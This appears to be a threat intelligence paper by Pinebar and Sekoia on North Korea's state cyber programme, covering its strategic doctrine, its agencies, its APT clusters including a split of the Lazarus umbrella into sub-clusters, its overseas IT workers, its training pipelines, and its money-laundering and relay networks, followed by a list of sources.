
This research was conducted in partnership between Pinebar and Sekoia, with contributions from Clifford (Pinebar), Coline Chavane, Saee Vaidya. and the Sekoia TDR Team.
> The DPRK built its cyber capability as a deliberate extension of its asymmetric deterrence doctrine, treating cyber operations as a cheap, deniable "all-purpose sword" alongside nuclear weapons to make sure regime survival against better-resourced adversaries and circumvent international sanctions.
> From roughly 2014 onward, cyber operations evolved from espionage and sabotage into a load-bearing revenue stream, bank heists, ransomware, and cryptocurrency theft, financing the very weapons programmes that international sanctions were designed to constrain.
> Even as the GRIB (ex-RGB) and NIA (ex-MSS) consistently lead DPRK cyber offensive operations, the units and bureaus beneath them are subject to constant reorganization, a deliberate control mechanism that keeps agencies competing for Kim Jong-un's favor, prevents consolidation of independent power, and complicates the attribution and sanctions-designation efforts of foreign governments.
> DPRK offensive cyber operations are distributed across APT clusters, with the former Lazarus umbrella now decomposed by Sekoia and Pinebar into six distinct sub-clusters, nearly all of which conduct lucrative operations, whether as their primary mandate or to self-fund espionage and sabotage campaigns.
> These APT intrusion sets are complemented by thousands of IT workers operating under false identities worldwide, who serve a dual function: remitting salaries to the regime and using their insider access within contracted organizations to conduct further operations, with proceeds laundered through centralized exchanges, decentralized exchanges (DEXs), and P2P platform.
> The DPRK has constructed a complex network of educational and private intermediaries to enable its cyber operations, spanning academic institutions that both train operatives and function as operational nodes.
> This parallel web of third-country relays often extends to allies like China and Russia, as well as countries in Africa and Southeast Asia. Front companies across these regions participate in generating revenue and providing operational cover, while criminal networks are operationalized for money laundering.
The Democratic People's Republic of Korea (DPRK) has established itself as one of the more prominent state actors in cyberspace. For Pyongyang, cyber operations serve as an instrument of sanctions evasion, a means of projecting reach beyond a diplomatically and economically constrained periphery, and a source of revenue for a structurally weakened economy. These capabilities are the product of a deliberate strategy, considerably reinforced under Kim Jong-un, which situates information warfare at the centre of contemporary geopolitical confrontation.
The consequences of that strategy are visible in the growth of the operator base, the successive reorganizations of the institutions holding offensive cyber mandates, and the expanding frequency and sophistication of DPRK operations and revenue-generation activity. As the regime continues to consolidate these capabilities and project them globally, an understanding of the DPRK cyber threat has become a practical necessity for governments and private organizations alike.
This paper seeks to provide the elements required for such an understanding: the function of cyber operations within Pyongyang's wider strategic posture, the organization of offensive capabilities across DPRK institutions, and an overview of threat clusters through which that architecture manifests. The research was conducted in partnership between Sekoia and Pinebar.
The Democratic People's Republic of Korea (DPRK) was proclaimed on 9 September 1948, a few years after Japan's 1945 surrender ended thirty-five years of colonial rule and left the peninsula divided by Soviet and American occupation zones along the 38th parallel. In the Soviet-administered north, Moscow installed Kim Il-sung, a former guerrilla commander who had fought Japanese forces in Manchuria, as chairman of the provisional government. Soviet advisers helped build the Korean Workers' Party (KWP) and the nascent security apparatus that would outlast the occupation itself.
Kim Il-sung consolidated power through the Korean War (1950-1953) and subsequent purges of rival factions. Then, he built a totalitarian, Stalinist-inspired state organized around juche (self-reliance) and an increasingly elaborate cult of personality that was extended, after his death in 1994, to his son Kim Jong-il and, since 2011, to his grandson Kim Jong-un.
Institutionally, the DPRK is a party-state in which the KWP, the state bureaucracy (headed by the State Affairs Commission, SAC) and the military are formally distinct but functionally fused under the Kim family's personal authority. As chairman of the SAC, supreme commander of the Korean People's Army (KPA) and chairman of the KWP's Central Military Commission, Kim Jong-un holds simultaneous command of the party, the cabinet and the armed forces.
Within this structure, intelligence and covert operations, including cyber activity, sit primarily under the Reconnaissance General Bureau (RGB), formed in 2009 by merging several older intelligence organs and reporting directly to Kim rather than through the conventional military chain of command, alongside the General Staff Department of the KPA and the Ministry of State Security.

The regime's overriding objective has remained its own survival against what it portrays as existential threats from Washington and Seoul. From this core goal, three broad and evolving strategic lines can be traced. First, military-first (Songun policy) deterrence, which, after the collapse of Soviet and Chinese economic patronage in the 1990s, hardened into a nuclear and missile program intended to make forced regime change too costly to attempt. This culminated in nuclear tests from 2006 onward and, more recently, constitutional changes formally vesting command of nuclear forces in the SAC chairman.
Second, Pyongyang has aimed at asymmetric and covert capability-building, with the use of electronic warfare, cyber operations, special forces, and proliferation networks, designed to inflict cost on adversaries and generate hard currency while remaining below the threshold of open war. This doctrine has been traced to North Korea's study of the 1991 Gulf War and the 2003 Iraq War, and to inspiration drawn from the concept of information warfare developed in China. It was later reinforced by Kim Jong-un's speech at the 3rd Plenary Meeting of the 7th KWP Central committee in April 2018, when he announced the achievement of the Byungjin policy’s objectives, which were the development of nuclear capabilities in parallel with the economy. As a new guideline, he stated that the DPRK would focus on socialist economic construction, pivoting from a doctrine of “military-first” to “economy-first”. As a result, the number of DPRK cyber operators and lucrative operations targeting cryptocurrency rose as the nascent global crypto market exploded.
Third, since 2024, the DPRK has formally abandoned the unification goal that had nominally guided its policy since 1948. Indeed, Kim Jong-un declared inter-Korean relations to be between "two hostile states," and the KWP subsequently dismantled unification-oriented institutions and revised the constitution in 2026 to define South Korea as foreign territory rather than a temporarily separated part of the same nation. This shift reflects both domestic legitimation needs, with Kim Jong-un increasingly grounding his authority in constitutional and popular-sovereignty language rather than purely dynastic cult of personality claims, and a geopolitical recalculation: deepening alignment with Russia since the invasion of Ukraine, and a long-standing reliance on China, have reduced Pyongyang's incentive to court Seoul or maintain ambiguity for the sake of eventual unification.
Cyber capability was progressively folded into this strategic architecture. Kim Jong-il began prioritizing "electronic warfare" after observing the decisive role of networked, information-enabled forces in the Gulf, Kosovo and Iraq wars, reportedly describing cyberattacks as "atomic bombs" of the information age.
His successor, Kim Jong-un, who is a computer-science-trained leader, later called cyber operations an "all-purpose sword" alongside nuclear weapons and missiles. Because cyber operations are cheap compared to conventional weapons, deniable, and effective against wealthier and more networked states, such as South Korea and the United States, they became a natural extension of the asymmetric-deterrence line of DPRK.
Consequently, cyber operations have moved from a niche military-modernization experiment (cf. 2009-2011 DDoS attacks) to a load-bearing pillar of DPRK statecraft, simultaneously an intelligence tool, a sanctions-evasion mechanism, and a revenue stream for the nuclear and missile programs that anchor the regime's core survival strategy under Kim Jong-un’s influence.
Computer networks exploitation (CNE) and attack (CNA) became a core priority, with talented children identified in school to integrate elite hacking universities, the emergence of first DPRK-led destructive cyber operations (Operation DarkSeoul 2013, Sony PIctures Hack 2014, WannaCry 2017), the multiplication of intelligence gathering operations, and the systematic use of cyber campaigns for revenue generation.
Indeed, from roughly 2014 onward, cyber operations became an increasingly important financing mechanism for the heavily sanctioned DPRK economy, as the regime shifted from pure espionage and sabotage toward bank heists, ransomware, and large-scale cryptocurrency theft (cf. the 2016 Bangladesh Bank $101 million heist and the 2025 Bybit $1.5 billion theft), reportedly generating hundreds of millions to over a billion dollars annually to help fund weapons programs.
As previously mentioned, the North Korean regime relies on institutions such as the Korea Workers’ Party (KWP) and the General Reconnaissance and Information Bureau (GRIB), formerly known as the RGB to facilitate its offensive cyber operations. These operations are considered to be an integrated strategic tool or an “all-purpose sword” to achieve the economic and geopolitical objectives of the regime.
The GRIB is considered to be the Kim regime’s leading foreign intelligence agency and military reconnaissance unit. However, its functions are far broader than a traditional military intelligence agency. In addition to intelligence collection and clandestine operations, the GRIB commands the DPRK’s most capable cyber offensive and combat units. Furthermore, The bureau has used front companies such as the UN-designated Green Pine Associated Corporation (KPe.010) to conduct illicit arms trade and procurement.
To conduct these varied operations, the GRIB (ex-RGB) is uniquely placed within the DPRK political and military structure. The agency is hierarchically under the North Korean State Affairs Commission (SAC) and reports directly to the KPA Supreme Commander Kim Jong-un. Concurrently, its administrative military designation is KPA Unit 586.
Before the RGB was established, Demilitarized Zone (DMZ) infiltration operations were handled by the KPA Reconnaissance Bureau, a long-standing unit under the KPA General Staff. In 2009, as Kim Jong-un prepared to take power, North Korea restructured this bureau into the RGB, a large consolidated task force. The new RGB merged the former Reconnaissance Bureau's large-scale reconnaissance and infiltration functions with the KWP Operations Department and the overseas intelligence operations of KWP Office 35.
Thus, the RGB at its inception in 2009 represented streamlined control and command of all intelligence operations. Cyber warfare capabilities have also grown in their effectiveness and importance to the Kim regime more than any other operational functions, thus the reorganization allowed for better control by the Supreme Leader for command as well as political-military oversight.

The National Intelligence Agency (NIA), formerly the Ministry of State Security (MSS) is the regime’s primary counterintelligence, and secret police agency, tasked with internal security and protecting the leadership from domestic and foreign threats. It reports directly to the State Affairs Commission under Kim Jong-un, ensuring loyalty to the ruling party. Though it is primarily an internal security body, it is also believed to coordinate with military and cyber units to support regime stability and strategic goals, including conducting intelligence operations targeting foreign governments, defectors, and dissident groups.
In June 2026, this Ministry was renamed as the National Intelligence Agency (NIA), or the State Intelligence Agency. Originally, the MSS operated counterintelligence and counterespionage missions, conducting cyber campaigns targeting defectors and DPRK experts. Its renaming was likely as a sign of an expansion of its field of competencies, especially for foreign missions and of a new repartition with the Ministry of Public Security (MPS), which will likely assume the role of a domestic police force.

Kim Jong-un frequently signals his priorities for economic and military development in his annual addresses to the KWP plenary meetings. After these addresses, the cyber program’s units are observed to quickly shift to new mission areas in line with Kim’s statements. Thus, the KWP is crucial to sense the political direction which mandates cyber offensive activities.
The KWP also retains a parallel role through bodies like the Organization and Guidance Department (OGD), which controls senior personnel appointments across the party, military, and government and enforces the regime's internal political and censorship controls, giving the party a supervisory hand over the same personnel pipeline that feeds intelligence units. Additionally, educational programs in DPRK universities focusing on developing skills in science, technology, engineering, and math (STEM), which ultimately produce “information warriors” are also set up under the direction of the KWP.
Despite the existence of institutions clearly identified as housing North Korea’s offensive cyber capabilities, the frequent reshuffling of responsibilities makes mapping the hierarchy of political-military entities including units, bureaus and liaison offices difficult.
According to some DPRK-watchers, North Korean intelligence agencies have continuously been reorganized and/or redesignated, shifting between combined and independent structures over time to align with the regime’s strategic goals . For instance, in March 2026, the regime removed references to reunification with South Korea from the DPRK constitution, signaling a push for a more hostile policy toward South Korea. The push for the restructuring of the GRIB (ex-RGB) and NIA (ex-MSS) came soon after, possibly reflecting an effort to realign the intelligence apparatus with the leadership’s long‑term state‑building goals.
Moreover, splitting intelligence missions across multiple agencies creates competition among them for the Supreme Leader's favor. This allows him to keep the agencies watching one another, which strengthens regime security and longevity; a key goal of the regime being its survival, and response to global events.
By analyzing the roles of North Korean entities with cyber offensive functions, certain plausible links can be drawn between their nomenclatures and roles. It must be noted that certain discrepancies will remain and these entities are subject to frequent change.
Organizationally, offensive cyber operators are largely diluted into various entities, inside and outside DPRK borders.
Units related to publicly tracked Advanced Persistent Threats (APTs) are intrusion sets sitting mainly within the GRIB (ex-RGB), and to a smaller extent, within the NIA (ex-MSS). An intrusion set is a cluster of malicious cyber activity characterized by its specific victimology, a dedicated arsenal, comprising tools and malware, and key patterns in terms of infrastructure and Tactic, Techniques and Procedures (TTPs).
In addition, DPRK cyber activity is supported by fake IT workers, who are North Korean nationals and foreigners recruited to secure technical jobs, channel salaries and information back to the regime, and/or conduct operations from abroad.
In this section, we will present the DPRK-nexus threat actors conducting offensive cyber operations to support Pyongyang strategic objectives, evade sanctions and fund ballistic missiles and nuclear programmes.
An important characteristic of these activity clusters is that they almost all conduct lucrative operations. For some of them, it constitutes their main operational objective, while, for others, notably with a focus on cyberespionage, it can be explained by a need to self-fund their operations.
Since the integration of offensive cyber capabilities in DPRK strategy, sophisticated units were implemented, often tracked as APTs. These clusters have been mandated to conduct various types of operations, ranging from financially-motivated campaigns, to cyber espionage, sabotage and influence.

As explained previously, these units have been regularly reorganized and renamed, making the understanding of North Korea’s cyber ecosystem complex. We categorized DPRK-nexus threat clusters depending on their TTPs and the type of operations they conduct. We notably made our clustering evolved by splitting the Lazarus umbrella into six distinct sub-clusters: TEMP.Hermit, Citrine Sleet, CryptoCore, Jade Sleet, Moonstone Sleet, and Famous Chollima. Famous Chollima distinguished itself by representing malicious activity related to fake IT workers, which often supports the operational objectives of other cyber warfare units.

DPRK-nexus threat clusters focusing primarily on intelligence collection sit under the GRIB (ex-RGB). Even if their affiliation to the 3rd and/or the 5th Bureau is debated among the CTI community, they are the inheritage of the historical Lazarus umbrella and Kimsuky cluster.
We identify cyberespionage as the primary objective of the threat clusters mentioned below, as their arsenal and associated campaigns pointed out to intelligence collection capabilities. However, they also happened to conduct cybercrime activity at the margin, likely to self-fund their operations.
Similarly to the Lazarus umbrella, which is now associated with several threat clusters, likely reflecting an internal reorganization following an increase in the number of operators, Kimsuky is regarded as a mega-cluster comprising several branches, like TA406 and TA408 among others.

Historically, DPRK-nexus threat clusters associated with cyberespionage campaigns also conducted sabotage operations using wipers. Well-known cases are the Operation Dark Seoul (2013), and the Operation Blockbuster (Sony Picture Hack) (2014) attributed to Lazarus. Kimsuky was also observed using wiper components during the Korea Hydro and Nuclear Power breach in 2014. However, no investigations pointed out the use of wipers in recent campaigns, likely due to refocus on stealthy espionage operations. The most recent case was APT38, now considered as splitted between CryptoCore and Jade Sleet, which was a financially-motivated threat cluster, which used disk-wipe techniques (KillDisk) as an anti-forensics measure in 2017.
Characteristic of Pyongyang’s strategy, a set of DPRK-nexus threat clusters conduct both financially-motivated campaigns and cyberespionage, likely to support the development and the funding of the nuclear and ballistic missiles programs.
Of note, Andariel is particular as it used custom ransomware (Maui and H0lyGh0st) for financial theft, as well as ransomware-as-a-service (RaaS) developed by an operator of the Russian cybercrime ecosystem. It was notably observed collaborating with Play in 2024. Another DPRK cluster, Moonstone Sleet, acted similarly by deploying its custom malware FakePenny in 2024, but also the Qilin RaaS in 2025. It is interesting to note that the two clusters integrated RaaS in their campaigns within two months of each other.

In a transition phase during which the Lazarus umbrella likely reorganized internally, the group was divided into sub-clusters, likely specializing their activity between financial gain and espionage. This evolution happened between 2018 and 2023, in the context of an expansion of the cryptocurrency market globally.
As a result, the sub-cluster APT38 was identified and associated with financially-motivated operations likely conducted by the 110th Research Institute under the GRIB (ex-RGB). It focused on the targeting of the cryptocurrency industry, Web3 and blockchain technologies.
Currently, APT38 has likely splitted in two sub-clusters that we associate with CryptoCore and Jade Sleet as a result of our research. These two clusters are characterized by focusing exclusively on financially-motivated campaigns, likely to generate revenue for the regime.

In line with the NIA (ex-MSS) mandate, the related threat cluster Reaper focuses on DPRK defectors, South Korean DPRK-focus activists and NGOs, acting as a secret police with cyber means. This new ministry name implemented in 2026 likely confirmed the wide range of sectors, mainly in South Korea, targeted by Reaper for espionage. Indeed, it is likely as a sign of an expansion of MSS competencies and of a new repartition with the Ministry of Public Security (MPS), which will likely assume the role of a police force focused on internal affairs.
Reaper also likely increased in 2024, with the dismantlement of the United Front Department. According to analysts, cyber operators from the United Front Department were transferred notably to the GRIB (ex-RGB) and to the NIA (ex-MSS).

Beyond the operations of APTs intrusion sets, the DPRK's offensive cyber capabilities are complemented by the activities of IT workers. They are skilled individuals, predominantly DPRK nationals and in some cases supported by foreign facilitators recruited online, tasked with generating revenue for the regime to circumvent international sanctions and finance the country's ballistic missile and nuclear programmes.
The IT-worker programme adapts an established practice rather than inaugurating a new one: the dispatch of North Korean labor abroad to earn foreign currency dates to the 1960s and 1970s, beginning with logging in the Soviet Far East before broadening into construction, textiles and restaurant services across Russia, China, the Gulf and Africa. The shift into the IT sector is documented publicly from at least 2018, when the US Treasury designated Yanbian Silverstar and Volasys Silverstar as IT-worker front companies, and was set out systematically in the 2022 joint advisory of the US Departments of State and the Treasury and the FBI.
Their number is estimated in the thousands, operating both within and beyond the DPRK's borders and systematically obfuscating their location and identity to secure contracts in the IT sector. Such employment serves as use in two respects: it enables the remittance of salaries to the regime, and it affords privileged access from which to conduct operations for financial gain or espionage.
Cross-referencing with stealer logs surfaced the profiles of IT workers themselves, indicating that they draw on the same infrastructure as the operators conducting intrusions. Infiltration appears in part opportunistic rather than target-driven. In the cases observed, workers queried internal corporate documentation while nominally engaged as employees, and reproduced the same behavior within client organizations where they can be deployed as remote consultants. This placement model allows them to extend their reach beyond the entity that contracted them.

The workers are organized into units embedded across a heterogeneous range of host entities: DPRK military and state institutions, state-owned enterprises, front companies, legitimate businesses abroad, and universities. Although the units from which they operate are not concentrated within a limited set of characteristic organizations, it can nonetheless be monitored through their means of communication, which are considerably more constrained. Three channels can be distinguished:
An interesting inflection point in these communications can be situated around October 2022. Internal exchanges, previously conducted in Korean and in a markedly formal register, thereafter shifted to English, a change assessed to follow a directive, and consistent with aligning working practices to international norms while reducing the distinctiveness of the workers' online presence.
Internal policy on internet access likewise appears considerably more permissive than for the ordinary DPRK citizen: identified users adopt working pseudonyms drawn from Western, South Korean and Japanese popular culture (G-Dragon, Superman, James Bond, Harry Potter, Olaf, Kisame). The practice presupposes a degree of cultural exposure, and a latitude in displaying it, unavailable to the general population.

Recruitment into IT workers roles follows a formalized selection process, notably documented by the Korea Institute for National Unification, which indicates that access to the function is far from open to the general population. Candidates must first satisfy vetting on political and social background, both their own (songbun) and that of their family (todae), before they can be considered for overseas deployment. Individuals with relatives resident abroad are excluded from selection outright, and a substantial proportion of those eventually dispatched have prior employment in Pyongyang or other major cities. At the final stage, candidates seeking a particular destination are expected to pay for it, the scale of the bribe varying with the nature of the mission to which they are assigned.

Stealer logs indicate that selection is followed by a structured onboarding phase. The material recovered covers the workers' assigned objectives, prescribed means of communication, the platforms to be used in conducting fraudulent activity, and a body of development-related reference questions. The presence of such material suggests that workers enter the programme with little or no direct exposure to the outside world, and that the requisite operational and cultural knowledge is supplied at induction rather than presupposed.

The primary function of DPRK IT workers is the generation of revenue for the regime, directed towards circumventing international sanctions and financing its ballistic missile and nuclear programmes. The restrictions on DPRK labor abroad were introduced incrementally by the United Nations through 2017: decision UNSCR 2371 capped worker numbers at existing levels; the decision UNSCR 2375 barred the issuance of new work authorisations ; and the decision UNSCR 2397 required the repatriation of all DPRK nationals earning income in member states' territories by 22 December 2019.
The cumulative effect was to remove any lawful basis for employing DPRK labor abroad. However, as each obligation is linked to nationality, concealing this fact at the time of recruitment places the transaction outside the scope of the ban, at least from the employer’s perspective. The IT workers model therefore relies on the use of a false identity during recruitment, and on the laundering of the resulting profits. Documented conversion methods include:
Alongside APT groups, DPRK IT workers are also found to be engaging in cryptocurrency thefts. Some documented instances include OnyxDAO ($3.8 million), Munchables ($62.5 million) and Exclusible Penthouse ($827,000). It is interesting to note that in one of the theft operations in (Munchables 2024), funds stolen by probable IT workers were ultimately returned due to operational challenges faced in the laundering process.

As a heavily sanctioned country, the DPRK has constructed a complex network of intermediaries, whether educational, entrepreneurial, or criminal, to enable its cyber offensive operations. These intermediaries fall into two broad categories.
The first is educational institutions, which serve a dual purpose. They train the DPRK's cyber operatives, and, in the later stages of education, they function as operational nodes for offensive activity, particularly when located in allied countries such as China or Russia.
The second is a web of third-country relays and enterprises. These help the DPRK overcome domestic technical constraints related to infrastructure and networks, enable plausible deniability, and serve as financial relays to circumvent sanctions.
North Korean Institutes are the first stepping stone in the training of cyber operators, starting as early as primary school. The brightest students, aged 11 to 17, are funneled through elite, specialized educational institutions like Kumsong Middle Schools located in the capital, before advancing to Kim Il-sung University and Kim Chaek University of Technology to begin their training as “cyber warriors”. Other colleges like Hamhung and Moranbong focus on cyber engineering, giving students roughly ten years of training by graduation.
In exchange, families get perks like Pyongyang relocation and extra rations. At university, top performers are chosen for advanced hacking training, then commissioned into the KPA's GRIB (ex-RGB) or placed in IT units under the Munitions Industry Department (MID) or Ministry of National Defense (MND). This process can be observed in the following talent pipeline.

Beyond this internal talent recruitment process, the DPRK also relies on exchanges with foreign universities to train its operators. These exchanges also serve as operational channels thanks to the close ties between the DPRK and the host country. This is particularly evident in the cases of China and Russia.
North Korea and China have historically maintained close-relations, owing to a shared history of communist movements. Today, China remains one of North Korea’s closest allies despite a tumultuous relationship. Thus, it is not surprising that formal training and access to resources for DPRK cyber talent is also provided through a network of universities in China.
During our investigation, we found mentions of several Chinese universities in stealer logs of DPRK IT workers, including Shanghai University of Electric Power, Chongqing University and Beijing Institute of Technology. The complete list of universities can be found in Annex 1. According to official diplomatic communications, “DPRK students at institutions such as Jilin University and Yanbian University gain insights from China’s reform and opening-up, and advancements in science and technology, which they bring back to their country”.
However, these universities are known to host DPRK-nexus malicious actors, for instance in joint research centre facilities, and offer them operational stability.
North Korea has also replicated this strategic model in Russia to expand its operational footprint, especially as Beijing increasingly seeks to distance itself from North Korea to avoid Western sanctions.
Alongside the strengthening of long-existing ties between Russia and North Korea, educational exchanges between these two countries also expanded quickly since the former’s 2022 invasion of Ukraine. This is highlighted by mandatory Russian language schooling in the DPRK, increased university scholarships, and high-level academic delegation visits.
Indeed, Russian is now a compulsory subject in DPRK schools from the 4th grade onward. According to Alexander Kozlov, co-chair of the intergovernmental commission of the Russian Federation and North Korea, 96 North Korean citizens were accepted to Russian universities. Furthermore, Russia granted over 36,000 entry visas to North Koreans in 2025 (a fourfold increase from 2024) among which over 98% were for education. These closer ties with Moscow are likely used to uplift Kim Jong un’s domestic image as a strong leader.
We observe that a key difference between the DPRK's exchanges with Russia and China lies in visa transparency: As of August 2026, Russia has publicly disclosed detailed data on visas issued to North Korean nationals, while China has not. This asymmetry might reflect, in part, China's tactical ambiguity, which aims to avoid being drawn into the conflict the DPRK faces with the West.
Finally, it is crucial to note that while these exchanges likely include some training and knowledge-sharing with partners who have well-developed cyber offensive ecosystems, such as China and Russia, their primary aim is to gain access to third-country networks to conduct cyber offensive operations.
North Korea often obscures its operational origins by using overseas intermediaries, particularly physical relay networks as channels for conducting cyber operations and criminal enterprises for laundering illicit funds.
Firstly, this allows the regime to compensate for its limited domestic internet infrastructure (2 325 IPS and 1 ASN in the DPRK, compared to 344 902 269 IPs and 6 656 ASNs in China) by rerouting attacks through relay networks in allied countries like China and Russia. Secondly, it allows for a web of state-sponsored, private and criminal actors to cooperate and generate revenue for the regime while evading sanctions.
Physical relay networks have not only served as a financial and infrastructural channel, but also as a physical base for DPRK cyber operations. In this context, physical relay network refers to overseas hubs, such as offices, hotels, or front companies staffed or frequented by DPRK operatives, that provide a base outside North Korea for conducting operations and generating revenue.
These operational networks are notably located in China, Russia, Southeast Asia, and certain African countries. Among them, China stands out, given its status as a historical partner of Pyongyang. These intermediaries can be both fronts or legitimate businesses with operators working for North Korea abroad. For instance, a member of the Lazarus Group was associated with Chosun Expo, which is a North Korean front company based in China. Additionally, operatives from Bureau 121, allegedly responsible for the 2014 Sony hack, were speculated to be working from Chilbosan Hotel in Shenyang, China during the operation. These methods were likely used to enable North Korea to plausibly deny its cyber operations.
Yet another example is Chinyong Information Technology Cooperation Company (Chinyong), a sanctioned North Korean enterprise subordinated to the Ministry of People's Armed Forces (KPe.054), active since at least 2016. The enterprise is involved in the employment of DPRK IT workers overseas and the generation of illicit revenue abroad. Chinyong’s teams are primarily known to operate out of China, Laos, and Russia, where they engage in “traditional” freelance IT work, as well as in cryptocurrency theft using their insider access to blockchain projects.
In the African continent, DPRK front companies such as Junggongchon Trading Corporation are known to deploy IT worker teams in countries like Tanzania. According to the Chollima group, DPRK operatives are also likely deployed in Guinea and Nigeria through similar fronts.
At times, this physical infrastructure extends into the target countries themselves. In the United States, there were documented cases of “laptop farms”, which are third-party proxies used by DPRK IT workers to receive company-issued laptops, allowing them to appear as though they are working from within the US while operating from abroad.
Of note, physical relay networks are not only used by rank-and-file IT workers who are deployed abroad, but also by APT operators. For instance, Pinebar observed that fake IT workers and offensive teams often share the same VPN exit nodes. It is thus plausible that these operators either conduct cyber operations alongside their ostensible day-to-day work or, in the case of front companies, do so on a full-time basis, coordinating with counterparts based inside the DPRK.
The DPRK has historically exploited underground criminal systems to support state-building activities. Until the late 2010s, the most lucrative state-sponsored criminal operations included the smuggling of cigarettes and the creation of counterfeit money. Following the DPRK's pivot toward cyber operations as a source of illicit revenue, DPRK-nexus intrusion sets have applied a similar playbook to launder the proceeds of their operations.
These actors launder funds through criminal networks notably across Southeast Asia by actively exploiting the region’s vulnerable and weakly-regulated financial environment linked to local illicit actors. In particular, casinos and cryptocurrency exchanges with high-volume cash conversion channels in Myanmar, Thailand, Laos, and Cambodia have served as key operational nodes for money laundering.
Cambodia, in particular, has emerged as a laundering hub due to its less regulated financial and gambling sectors, with an estimated $37.6 million in North Korea-linked cryptocurrency laundered between 2021 and 2025 through the Cambodia-based Huione Group, whose executives have shown indications of direct ties to North Korean actors. Huione's infrastructure, including technical tools that facilitate scams and stablecoins that cannot be frozen, has allowed North Korea to bypass regulations, convert illicit proceeds into ostensibly legitimate assets, and sustain revenue generation from its cyber operations.
The DPRK's offensive cyber apparatus is not an adjunct to the regime's strategy but a constituent part of it. Most states maintain cyber capabilities for intelligence collection and military contingency, Pyongyang has additionally constituted them as a source of state revenue, notably to fund its nuclear and ballistic missile programmes, and that model has proven durable under sustained international pressure. The intrusion sets examined in this paper and the IT worker programme operating alongside them both serve this dual purpose.
Several conclusions can be drawn. First, the institutional map is unstable. Mandates are redistributed between bureaus, organs are periodically reorganized, and certain entities operate transversally rather than within the hierarchy. Ryonbong is a great example: its formal position within the defense-industrial structure does not necessarily translate its operational responsibility in IT workers’ campaigns.
Second, the IT worker programme fits awkwardly within conventional threat intelligence frameworks. It works like a criminal enterprise: the units are dispersed across a heterogeneous range of host entities, with the end goal of making profit. They use cyber means, but also fake identities, fraud schemes and lures to channel foreign currencies to the regime.
Third, the distinction between espionage and revenue generation is less firm than it appears. Access acquired for financial purposes has been turned to collection, and the same infrastructure appears to serve both. On the other hand, intelligence units self-fund their operations, conducting lucrative campaigns at the margin.
Aliases proliferate, clusters are divided and consolidated differently across vendors. However, what endures is the understanding of how the DPRK operates. Indeed, the history of these clusters and following their successive reconfigurations, alongside their characteristic tradecraft and motivations can help defenders to better monitor and anticipate the threat posed by Pyongyang operators. This paper is intended to support that approach.

The Reconnaissance General Bureau: The Kim Regime’s “Precious Treasured Sword” – The Committee for Human Rights in North Korea, February 2026 – ../www.hrnk.org/documentations/the-reconnaissance-general-bureau-the-kim-regimes-precious-treasured-sword/
The All-Purpose Sword: North Korea’s Cyber Operations and Strategies – IEEE, May 2019 – https://ieeexplore.ieee.org/document/8756954/
White Paper on Human Rights in North Korea 2023 – Korea Institute for National Unification) – https://www.kinu.or.kr/eng/module/report/view.do?idx=125351&nav_code=eng1674806000
Hidden Enablers: Third Countries in North Korea’s Cyber Playbook – July 2025 – https://www.csis.org/analysis/hidden-enablers-third-countries-north-koreas-cyber-playbook
North Korea’s Constitutional Amendments Cement the Regime’s Strategic Posture – Institute for the Study of War, June 2026 – https://understandingwar.org/research/china-taiwan/north-koreas-constitutional-amendments-cement-the-regimes-strategic-posture/
North Korea’s Economic Policy in 2018 and Beyond: Reforms Inevitable, Delays Possible - 38 North: Informed Analysis of North Korea – 38 North, August 2018 – https://www.38north.org/2018/08/rfrank080818/
Quick Take: The Leader Gets a Strong Constitution - 38 North: Informed Analysis of North Korea – 38 North, May 2026 – https://www.38north.org/2026/05/quick-take-the-leader-gets-a-strong-constitution/
Youth as torchbearers of China-North Korea relations – https://asianews.network/youth-as-torchbearers-of-china-north-korea-relations/
North Korea-Russia People-to-People Exchanges as a Tool for Sustained Dialogue - 38 North: Informed Analysis of North Korea – 38 North, June 2025 – https://www.38north.org/2025/06/north-korea-russia-people-to-people-exchanges-as-a-tool-for-sustained-dialogue/
2025 Crypto Theft Reaches $3.4 Billion – Chainalysis, December 2025 – https://www.chainalysis.com/blog/crypto-hacking-stolen-funds-2026/
Analysis of DPRK-Linked Money Laundering Infrastructure – https://s2w.inc/en/resource/detail/1090
How DPRK’s Contagious Interview Campaign Targets Developers - Pinebar research Center – .//research/how-dprks-contagious-interview-campaign-targets-developers
How North Korea’s Hackers Became Dangerously Good - WSJ – https://www.wsj.com/articles/how-north-koreas-hackers-became-dangerously-good-1524150416
Internal Security and IC Changes | North Korea Leadership Watch – https://www.nkleadershipwatch.org/2026/06/05/internal-security-and-ic-changes/
KillDisk now targeting Linux: Demands $250K ransom, but can’t decrypt – https://www.welivesecurity.com/2017/01/05/killdisk-now-targeting-linux-demands-250k-ransom-cant-decrypt/
Organization Guidance Department and WMD Program | North Korea Leadership Watch – https://www.nkleadershipwatch.org/the-party/organization-guidance-department-and-wmd-program/
Thread on exfiltrated North Korean payment server data – @zachxbt, April 2026
S/RES/2371 2017 | Security Council – https://main.un.org/securitycouncil/en/s/res/2371-%282017%29
S/RES/2397 2017 | Security Council – https://main.un.org/securitycouncil/en/s/res/2397-%282017%29
South Korean researchers uncover another cyber-espionage campaign from the North – https://therecord.media/apt37-scarcruft-cyber-espionage-campaign-south-korea
The DPRK’s Violation and Evasion of UN Sanctions through Cyber and Information Technology Worker Activities – ../msmt.info/Publications/detail/MSMT%20Report/4221
Chinyong Information Technology Cooperation Company – OpenSanctions.org, May 2023 – https://www.opensanctions.org/entities/NK-37t8mDJBBsxKzZxfhW8Qo2/
Third Bureau of the Reconnaissance General Bureau – OpenSanctions.org, August 2023 – https://www.opensanctions.org/entities/kprusi-3d6e2f6255ea677c2f68d1508bd161d2a3645db8/
Munchables hacker returns $62.8M Ether without ransom – Cointelegraph, March 2024 – https://cointelegraph.com/news/munchables-hacker-returns-ether-without-ransom
Onyx protocol exploited a second time for $3.8M via known bug – TradingView, September 2024 – https://www.tradingview.com/news/cointelegraph:5ca7f0869094b:0-onyx-protocol-exploited-a-second-time-for-3-8m-via-known-bug/
FinCEN Finds Cambodia-Based Huione Group to be of Primary Money Laundering Concern, Proposes a Rule to Combat Cyber Scams and Heists | FinCEN.gov – May 2025 – https://www.fincen.gov/news/news-releases/fincen-finds-cambodia-based-huione-group-be-primary-money-laundering-concern
North Korea makes Russian mandatory in schools – POLITICO, November 2025 – https://www.politico.eu/article/north-korea-russia-mandatory-school-mgimo/
Treasury Sanctions Clandestine IT Worker Network Funding the DPRK’s Weapons Programs – U.S. Department of the Treasury, June 2026 – https://home.treasury.gov/news/press-releases/sb0205
Treasury Sanctions DPRK Bankers and Institutions Involved in Laundering Cybercrime Proceeds and IT Worker Funds – U.S. Department of the Treasury, June 2026 – https://home.treasury.gov/news/press-releases/sb0302
